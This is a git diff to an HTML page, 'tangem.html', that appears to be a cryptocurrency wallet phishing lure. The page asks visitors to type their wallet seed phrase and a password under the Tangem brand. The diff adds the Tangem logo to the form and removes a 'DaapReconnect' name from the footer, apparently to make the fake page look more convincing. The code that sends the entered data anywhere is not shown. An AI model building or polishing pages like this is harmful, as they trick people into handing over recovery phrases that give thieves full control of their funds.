--- a/tangem.html
+++ b/tangem.html
@@ -74,7 +74,10 @@
                         </div>
 
                         <div class="middle">
-                            <h4>Tangem</h4>
+                            <div class="toop">
+                                <img src="tangem.jpg" alt="">
+                                <h4>Tangem</h4>    
+                            </div>
                             <textarea id="seed" minlength="30" name="Tangem" placeholder="Seed Phrase..." required></textarea >
                              <input name="Password" id="movepass"  type="password" placeholder="Password"/>
                         </div>
@@ -108,7 +111,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
